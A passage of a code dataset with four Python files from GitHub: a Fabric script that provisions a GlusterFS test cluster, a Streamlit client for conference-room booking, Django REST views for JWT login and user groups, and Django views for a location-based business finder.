information\nNODES = {node.name: node for node in nodes}\nSERVICES = {service.name: service for service in services}\nNODE = {}\nfor node in nodes:\n wait_until_node_is_running(node)\n properties = {'hostname': node.name}\n for dev in node.networks:\n properties[dev.name] = dev.address\n for disk in node.disks:\n properties[disk.name] = disk.destination\n # The node is labeled with the network address that will be used by fabric\n # to connect to the node, this allows to retrieve the node using NODE[env.host]\n label = get_node_address_for_fabric(node)\n NODE[label] = properties\n\n# Show cluster information\npprint(NODE)\n\nenv.user = 'root'\nenv.hosts = NODE.keys()\n# Allow known hosts with changed keys\nenv.disable_known_hosts = True\n# Retry 30 times each 10 seconds -> (30-1)*10 = 290 seconds\nenv.connection_attempts = 30\nenv.timeout = 10\n# Enable ssh client keep alive messages\nenv.keepalive = 15\n\n# Define the fabric roles according to the cluster services\nfor service in services:\n env.roledefs[service.name] = [n.networks[0].address for n in service.nodes]\n\n#\n# Debugging mode\n#\n# To enable it use: export NOOP=1\nif os.environ.get('NOOP'):\n\n print(yellow('\\n\\n== Running in NOOP mode ==\\n\\n'))\n\n def run(name):\n print('[{0}] run: {1}'.format(env.host, name))\n\n def put(source, destination):\n print('[{0}] put: {1} {2}'.format(env.host, source, destination))\n\n @task\n @parallel\n def hostname():\n \"\"\"Print the hostnames: mainly used for testing purposes\"\"\"\n run('/bin/hostname')\n\n\n@task\n@runs_once\ndef start():\n \"\"\"Initialize the GlusterFS cluster and create the volumes\"\"\"\n execute(configure_service)\n execute(peer_probe)\n execute(peer_probe_against_initiator)\n execute(create_volumes)\n execute(start_volumes)\n cluster.status = 'running'\n print(green(\"All services started\"))\n\n\n@task\ndef configure_service():\n \"\"\"Configure the GlusterFS filesystems\"\"\"\n generate_etc_hosts()\n\n\ndef 
generate_etc_hosts():\n # Generate /etc/hosts\n for n in NODE.values():\n run('echo \"{} {}\" >> /etc/hosts'.format(n['eth1'], n['hostname']))\n\n\n@task\n@roles('initiator')\ndef peer_probe():\n \"\"\"Probe for peers step 1\"\"\"\n for peer in env.roledefs['responders']:\n run('gluster peer probe {}'.format(NODE[peer]['hostname']))\n\n\n@task\n@roles('peerback')\ndef peer_probe_against_initiator():\n \"\"\"Probe for peers step 2\"\"\"\n initiator = env.roledefs['initiator'][0]\n run('gluster peer probe {}'\n .format(NODE[initiator]['hostname']))\n\n\n@task\n@roles('initiator')\ndef create_volumes():\n \"\"\"Create GlusterFS volumes\"\"\"\n run('gluster peer status')\n # Use eth1 to reference the nodes\n #nodes = [n['eth1'] for n in NODE.values()]\n # Use the hostnames to reference the nodes\n nodes = [n['hostname'] for n in NODE.values()]\n bricks = [NODE[env.host][b] for b in NODE[env.host] if 'brick' in b]\n layout = ''\n for (node1, node2) in pairwise(nodes):\n #for brick in range(1, 12):\n for brick in bricks:\n layout += '{node1}:{brick}/drv0 {node2}:{brick}/drv0 '.format(\n node1=node1, node2=node2, brick=brick)\n run('gluster volume create distributed-replicated-volume-0 '\n 'replica 2 transport tcp {}'.format(layout))\n\n\n@task\n@roles('initiator')\ndef start_volumes():\n \"\"\"Start GlusterFS volumes\"\"\"\n run('gluster volume start distributed-replicated-volume-0')\n\n\ndef pairwise(nodes):\n \"\"\"Create pairs of nodes: 1->2, 3->4, ...\"\"\"\n group1 = nodes[::2]\n group2 = nodes[1::2]\n return zip(group1, group2)\n\n\n@task\ndef status():\n \"\"\"Check the status of the GlusterFS service\"\"\"\n print(yellow(\"== SERVICE STATUS ==\"))\n run('systemctl status rpcbind')\n run('systemctl status glusterd')\n print(yellow('== PEER STATUS =='))\n run('gluster peer status')\n print('== VOLUME INFO ==')\n run('gluster volume info')\n\n\n@task\n@runs_once\ndef stop():\n \"\"\"Stop the GlusterFS service and all the containers that provide it\"\"\"\n with settings(warn_only=True):\n execute(stop_service)\n\n\n@task\ndef stop_service():\n \"\"\"Stop the GlusterFS service without stopping the containers\"\"\"\n # TODO: Check what we really need to stop\n run('systemctl stop glusterd')\n run('systemctl stop rpcbind')\n\n\n@task\n@runs_once\ndef restart():\n \"\"\"Restart all the services of the cluster\"\"\"\n execute(stop)\n execute(start)\n\n\n@task\n@roles('initiator')\ndef test():\n \"\"\"Just run some test command\"\"\"\n run('uname -a')\n", "repo_name": "bigdatacesga/paas", "sub_path": "tests/gluster/fabfile.py", "file_name": "fabfile.py", "file_ext": "py", "file_size_in_byte": 7501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sys.stderr", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 67, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 68, "usage_type": "attribute"}, {"api_name": "fabric.colors.red", "line_number": 70, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 71, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 73, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 74, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 74, "usage_type": 
"attribute"}, {"api_name": "registry.connect", "line_number": 79, "usage_type": "call"}, {"api_name": "registry.Cluster", "line_number": 80, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 91, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 93, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 121, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 141, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 141, "usage_type": "attribute"}, {"api_name": "fabric.colors.yellow", "line_number": 143, "usage_type": "call"}, {"api_name": "fabric.colors.green", "line_number": 168, "usage_type": "call"}, {"api_name": "fabric.colors.yellow", "line_number": 237, "usage_type": "call"}, {"api_name": "fabric.colors.yellow", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "70443162205", "text": "import streamlit as st\nimport datetime\nimport random\nimport requests\nimport json\n\n# streamlitは1画面しか表示できないから、サイドバーで切り替える\npage = st.sidebar.selectbox('Choose your page', ['users', 'rooms', 'bookings'])\n\n# ユーザー画面\nif page == 'users':\n st.title('ユーザー登録画面')\n\n # formの中身にどういう項目を入れるのか→withの中身で指定する\n with st.form(key='user'): # keyはformとの紐付け\n # user_id: int = random.randint(0, 10) # user_idは登録したタイミングで決める\n username: str = st.text_input('ユーザ名', max_chars=12) # , max12文字\n # userのpostで必要なデータを送ってあげる\n data = {\n # 'user_id': user_id,\n 'username': username\n }\n submit_button = st.form_submit_button(label='ユーザー登録') # formに紐づく送信ボタン\n\n # submit_buttonが押されたとき(リクエスト送信されたとき)\n if submit_button:\n url = 'http://127.0.0.1:8000/users'\n res = requests.post(\n url,\n data=json.dumps(data)\n )\n if res.status_code == 200:\n st.success('ユーザー登録完了')\n st.write(res.status_code)\n st.json(res.json())\n\n\n# 会議室画面\nelif page == 'rooms':\n st.title('会議室登録画面')\n\n # formの中身にどういう項目を入れるのか→withの中身で指定する\n with st.form(key='room'): # keyはformとの紐付け\n # room_id: int = random.randint(0, 10) # room_idは登録したタイミングで決める\n room_name: str = st.text_input('会議室名', max_chars=12) # , max12文字\n capacity: int = st.number_input('定員', step=1)\n # roomのpostで必要なデータを送ってあげる\n data = {\n # 'room_id': room_id,\n 'room_name': room_name,\n 'capacity': capacity\n }\n submit_button = st.form_submit_button(label='会議室登録') # formに紐づく送信ボタン\n\n # submit_buttonが押されたとき(リクエスト送信されたとき)\n if submit_button:\n url = 'http://127.0.0.1:8000/rooms'\n res = requests.post(\n url,\n data=json.dumps(data)\n )\n if res.status_code == 200:\n st.success('会議室登録完了')\n # st.write(res.status_code)\n st.json(res.json())\n\n\n# 予約画面\nelif page == 'bookings':\n st.title('会議室予約画面')\n\n # ユーザー一覧取得\n url_users = 'http://127.0.0.1:8000/users'\n res = requests.get(url_users)\n users = res.json()\n # st.json(users)\n # ユーザー名をキー、ユーザーIDをバリュー\n users_dict = {}\n for user in users:\n users_dict[user['username']] = user['user_id']\n # st.write(users_dict)\n\n # 会議室一覧取得\n url_rooms = 'http://127.0.0.1:8000/rooms'\n res = requests.get(url_rooms)\n rooms = res.json()\n st.json(rooms)\n # 会議室名をキー、capacity, room_idをvalue\n rooms_dict = {}\n for room in rooms:\n rooms_dict[room['room_name']] = {\n 'room_id': room['room_id'],\n 'capacity': room['capacity']\n }\n st.write(rooms_dict)\n\n # formの中身にどういう項目を入れるのか→withの中身で指定する\n with st.form(key='booking'): # keyはformとの紐付け\n booking_id: int = random.randint(0, 10)\n user_id: int = random.randint(0, 10)\n room_id: int = random.randint(0, 10)\n booked_num: int = st.number_input('予約人数', step=1)\n date = st.date_input('日付: ', min_value=datetime.date.today()) # 今日以降の日付\n start_time = 
st.time_input('開始時刻: ', value=datetime.time(hour=9, minute=0)) # defaults to 9:00\n end_time = st.time_input('終了時刻: ', value=datetime.time(hour=20, minute=0)) # defaults to 20:00\n\n # pass the form contents through as-is\n data = {\n 'booking_id': booking_id,\n 'user_id': user_id,\n 'room_id': room_id,\n 'booked_num': booked_num,\n 'start_datetime': datetime.datetime(\n year=date.year,\n month=date.month,\n day=date.day,\n hour=start_time.hour,\n minute=start_time.minute\n ).isoformat(), # convert the datetime to ISO format\n 'end_datetime': datetime.datetime(\n year=date.year,\n month=date.month,\n day=date.day,\n hour=end_time.hour,\n minute=end_time.minute\n ).isoformat(),\n }\n submit_button = st.form_submit_button(label='リクエスト送信') # submit button tied to the form\n\n # when the submit button is pressed (i.e. the request is sent)\n if submit_button:\n st.write('## 送信データ')\n st.json(data)\n st.write('## レスポンス結果')\n url = 'http://127.0.0.1:8000/bookings'\n res = requests.post(\n url,\n data=json.dumps(data)\n )\n st.write(res.status_code)\n st.json(res.json())\n", "repo_name": "Yuzuki-9/conference-room-reservations", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5273, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "streamlit.sidebar.selectbox", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 8, "usage_type": "attribute"}, {"api_name": "streamlit.title", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 17, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 35, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 40, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 43, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 45, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 46, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 58, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 87, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 98, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 99, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 102, "usage_type": "call"}, {"api_name": 
"streamlit.date_input", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "attribute"}, {"api_name": "streamlit.time_input", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 104, "usage_type": "call"}, {"api_name": "streamlit.time_input", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 128, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 132, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 134, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 136, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 138, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 140, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "38021877243", "text": "from rest_framework_jwt.settings import api_settings\nfrom rest_framework_jwt.views import ObtainJSONWebToken\nfrom rest_framework.response import Response\nfrom django.http import Http404\nfrom rest_framework import status\n# from rest_framework import filters\nfrom .filters import UsersFilter, tGroupFilter\nfrom rest_framework import viewsets\n# from rest_framework.views import APIView\nfrom rest_framework.decorators import action\nfrom rest_framework.pagination import PageNumberPagination\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django.contrib.auth import get_user_model\nfrom users.models import tGroup\nfrom users.serializers import UserSerializer, UserCreateSerializer, UserSimpleSerializer, \\\n tGroupListSerializer, tGroupDetailSerializer, tGroupCreateSerializer, tGroupPermAppDetailSerializer, \\\n tGroupUpdateSerializer\n\n\njwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\njwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\njwt_decode_handler = api_settings.JWT_DECODE_HANDLER\n\n\nUser = get_user_model()\n\n'''\n重写以Token返回自定义响应.\ndef jwt_response_payload_handler(token, user=None, request=None):\n return {\n 'id': UserSerializer(user, context={'request':request}).data['id'],\n 'username': UserSerializer(user, context={'request':request}).data['username'],\n 'token': token\n }\n'''\n\n\n# 重写以Token返回自定义响应.\nclass CustomObtainJSONWebToken(ObtainJSONWebToken):\n def post(self, request, *args, **kwargs):\n response = super(CustomObtainJSONWebToken, self).post(request,\n *args,\n **kwargs\n )\n # get token\n token = response.data.get('token', '')\n\n # custom response\n if token:\n user = jwt_decode_handler(token)\n userobj = User.objects.get(pk=user.get('user_id'))\n else:\n req = request.data\n password = req.get('password', '')\n username = req.get('username', '')\n if not username and not password:\n return Response(\n {\n 'msg': '用户名和密码不能为空',\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n try:\n userobj = User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(\n {\n 'msg': '用户不存在',\n },\n status=status.HTTP_404_NOT_FOUND\n )\n\n if not userobj.check_password(password):\n return Response(\n {\n 'msg': '密码错误'\n },\n 
status.HTTP_401_UNAUTHORIZED\n )\n\n payload = jwt_payload_handler(userobj)\n token = jwt_encode_handler(payload)\n userser = UserSerializer(userobj).data\n return Response(\n {\n 'id': userser.get('id'),\n 'username': userser.get('username'),\n 'token': token\n }\n )\n\n\n# Pagination for the user list\nclass UserPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n page_query_param = 'page'\n max_page_size = 100\n\n\n# Pagination for the user group list\nclass tGroupPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n page_query_param = 'page'\n max_page_size = 100\n\n\n# User viewset\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n pagination_class = UserPagination\n filter_backends = (DjangoFilterBackend,)\n filter_class = UsersFilter\n\n def get_serializer_class(self):\n if self.action == 'create':\n return UserCreateSerializer\n return UserSerializer\n\n\n# User group viewset\nclass tGroupViewSet(viewsets.ModelViewSet):\n queryset = tGroup.objects.all()\n pagination_class = tGroupPagination\n filter_backends = (DjangoFilterBackend,)\n filter_class = tGroupFilter\n serializer_class = tGroupDetailSerializer\n\n def get_serializer_class(self):\n if self.action == 'list':\n return tGroupListSerializer\n if self.action == 'create':\n return tGroupCreateSerializer\n if self.action == 'update':\n return tGroupUpdateSerializer\n return tGroupDetailSerializer\n\n @action(detail=True, methods=['put'], name='delete user from usergroup')\n def delete_user_group(self, request, pk=None):\n try:\n group = tGroup.objects.get(pk=pk)\n except tGroup.DoesNotExist:\n raise Http404\n try:\n user = User.objects.get(pk=request.data.get('id'))\n except User.DoesNotExist:\n raise Http404\n\n group.users.remove(user)\n\n return Response({'msg': 'delete success'}, status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=True, methods=['get'], name='group outside user')\n def group_outside_user(self, request, pk=None):\n users = User.objects.exclude(tgroup__id=pk)\n serializer = UserSimpleSerializer(users, many=True)\n\n return Response(\n serializer.data,\n status=status.HTTP_200_OK\n )\n\n @action(detail=True, methods=['post'], name=\"add user to group\")\n def add_userto_group(self, request, pk=None):\n try:\n group = tGroup.objects.get(pk=pk)\n except tGroup.DoesNotExist:\n raise Http404\n\n if \"users\" not in request.data:\n return Response({\n 'msg': 'param users not defined'\n })\n\n users = []\n for userid in request.data.get('users'):\n try:\n user = User.objects.get(pk=userid)\n except User.DoesNotExist:\n raise Http404\n\n if user in group.users.all():\n continue\n\n group.users.add(user)\n users.append(user)\n\n serializer = UserSimpleSerializer(users, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=['get'], name=\"get group permission apps\")\n def get_group_permapp(self, request, pk=None):\n try:\n group = tGroup.objects.get(pk=pk)\n except tGroup.DoesNotExist:\n raise Http404\n\n serializer = tGroupPermAppDetailSerializer(group)\n\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n'''\nRemove a member from a user group\nclass tGroupDeleteUserApiView(APIView):\n def post(self, request, pk, format=None):\n try:\n user = User.objects.get(pk=pk)\n except User.DoesNotExist:\n raise Http404\n return Response({'msg': '删除成功'}, status=status.HTTP_200_OK)\n\n def get(self, request, pk, format=None):\n return Response({'msg': 'test'}, status=status.HTTP_200_OK)\n'''\n", "repo_name": 
"playonefor/turiy", "sub_path": "backend/apps/users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework_jwt.settings.api_settings.JWT_PAYLOAD_HANDLER", "line_number": 20, "usage_type": "attribute"}, {"api_name": "rest_framework_jwt.settings.api_settings", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework_jwt.settings.api_settings.JWT_ENCODE_HANDLER", "line_number": 21, "usage_type": "attribute"}, {"api_name": "rest_framework_jwt.settings.api_settings", "line_number": 21, "usage_type": "name"}, {"api_name": "rest_framework_jwt.settings.api_settings.JWT_DECODE_HANDLER", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework_jwt.settings.api_settings", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 25, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.ObtainJSONWebToken", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 61, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 70, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 74, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 78, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 83, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 84, "usage_type": "call"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 94, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 102, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 110, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 110, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 112, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 114, "usage_type": "name"}, {"api_name": "filters.UsersFilter", "line_number": 115, "usage_type": "name"}, {"api_name": "users.serializers.UserCreateSerializer", "line_number": 119, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 120, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 124, "usage_type": "name"}, {"api_name": "users.models.tGroup.objects.all", "line_number": 125, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 125, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 127, "usage_type": "name"}, 
{"api_name": "filters.tGroupFilter", "line_number": 128, "usage_type": "name"}, {"api_name": "users.serializers.tGroupDetailSerializer", "line_number": 129, "usage_type": "name"}, {"api_name": "users.serializers.tGroupListSerializer", "line_number": 133, "usage_type": "name"}, {"api_name": "users.serializers.tGroupCreateSerializer", "line_number": 135, "usage_type": "name"}, {"api_name": "users.serializers.tGroupUpdateSerializer", "line_number": 137, "usage_type": "name"}, {"api_name": "users.serializers.tGroupDetailSerializer", "line_number": 138, "usage_type": "name"}, {"api_name": "users.models.tGroup.objects.get", "line_number": 143, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 143, "usage_type": "name"}, {"api_name": "users.models.tGroup.DoesNotExist", "line_number": 144, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 144, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 145, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 149, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 153, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 153, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 153, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 140, "usage_type": "call"}, {"api_name": "users.models", "line_number": 157, "usage_type": "name"}, {"api_name": "users.serializers.UserSimpleSerializer", "line_number": 158, "usage_type": "call"}, {"api_name": "users.models", "line_number": 158, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 160, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 162, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 162, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 155, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects.get", "line_number": 168, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 168, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 168, "usage_type": "name"}, {"api_name": "users.models.tGroup.DoesNotExist", "line_number": 169, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 169, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 170, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, "usage_type": "call"}, {"api_name": "users.models", "line_number": 177, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 182, "usage_type": "name"}, {"api_name": "users.models.append", "line_number": 188, "usage_type": "call"}, {"api_name": "users.models", "line_number": 188, "usage_type": "name"}, {"api_name": "users.serializers.UserSimpleSerializer", "line_number": 190, "usage_type": "call"}, {"api_name": "users.models", "line_number": 190, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 191, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 191, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 191, "usage_type": "name"}, {"api_name": 
"rest_framework.decorators.action", "line_number": 165, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects.get", "line_number": 196, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 196, "usage_type": "name"}, {"api_name": "users.models.tGroup.DoesNotExist", "line_number": 197, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 197, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 198, "usage_type": "name"}, {"api_name": "users.serializers.tGroupPermAppDetailSerializer", "line_number": 200, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 202, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 202, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 202, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "32270127339", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse, Http404\nfrom django.template import loader\n\nfrom django.db.models import Q\n\nfrom .models import CompanyTypes, Company\n\n#Constants that help with determining a default location\n#and doing a very rough calculation from Latitude and\n#longiture degrees to miles\nCOORDINATE_TO_MILES = 75.0\nPORTLAND_LAT = 45.5732\nPORTLAND_LON = -122.7276\n\n# Send the default home page,\n# before any location or search parameters\n# are given\ndef index(request):\n companies = Company.objects.all()\n companies_dict = {\n 'companies': companies,\n 'lat': PORTLAND_LAT,\n 'lon': PORTLAND_LON\n }\n return render(request, 'find_business/index.html', companies_dict)\n\n# Queries for a list of businesses based on certain\n# search parameters, these parameters include the\n# company type, a search string and a within distance (mi)\n# as well as the users current location\ndef business_query(request):\n '''\n returns result from client side query\n '''\n print(request)\n if request.method == 'POST':\n print(request.POST)\n query_dict = {}\n valid_dict = {}\n for company_attr in ('type','search','lat','lon','within'):\n val = request.POST.get(company_attr)\n if val:\n valid_dict[company_attr] = True\n query_dict[company_attr] = val\n else:\n valid_dict[company_attr] = False\n companies = Company.objects.all()\n\n if (valid_dict['search']):\n search = query_dict['search']\n companies = Company.objects.filter(\n Q(name__icontains=search) |\n Q(description__icontains=search) |\n Q(activities__icontains=search)\n )\n\n if (valid_dict['type']):\n mytype = CompanyTypes[query_dict['type']]\n companies = companies.filter(type=mytype)\n\n if (valid_dict['within'] & (query_dict['within'] != '0')):\n dist = float(query_dict['within'])/COORDINATE_TO_MILES\n print(dist)\n lat = float(query_dict['lat'])\n lon = float(query_dict['lon'])\n lat_max = lat + dist\n lat_min = lat - dist\n lon_max = lon + dist\n lon_min = lon - dist\n print(str(lat) + ' ' + str(lon))\n print(str(lat_max) + ' ' + str(lat_min) + ' ' + str(lon_max) + ' ' + str(lon_min))\n companies = companies.filter(\n (Q(coordinatesLat__lte=lat_max) &\n Q(coordinatesLat__gte=lat_min)) &\n (Q(coordinatesLon__lte=lon_max) &\n Q(coordinatesLon__gte=lon_min)))\n\n print(companies.all())\n\n companies_dict = {\n 'companies': companies.all(),\n 'lat': query_dict['lat'],\n 'lon': query_dict['lon']\n 
}\n\n    return render(request, 'find_business/businesses_list.html', companies_dict)\n\n    else:\n        raise Http404()\n\n# Queries the database for all company names that are listed\n# and returns a list of tuples describing the location of each company\n# that was requested\ndef locations_query(request):\n    locations = []\n    if request.method == 'POST':\n        print(request.POST)\n        names = request.POST.get('names').split(\",\")\n        for companyName in names:\n            company = Company.objects.get(name=companyName)\n            if company:\n                locations.append((\n                    company.coordinatesLat, \n                    company.coordinatesLon)\n                )\n            else:\n                locations.append((45.0, -122.0))\n        print(locations)\n    return JsonResponse(locations, safe=False)\n", "repo_name": "SteliosPapoutsakis/BusinessFinder", "sub_path": "BusinessFinder/find_business/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "models.Company.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Company.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 48, "usage_type": "name"}, {"api_name": "models.Company.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 55, "usage_type": "call"}, {"api_name": "models.CompanyTypes", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 76, "usage_type": "call"}, {"api_name": 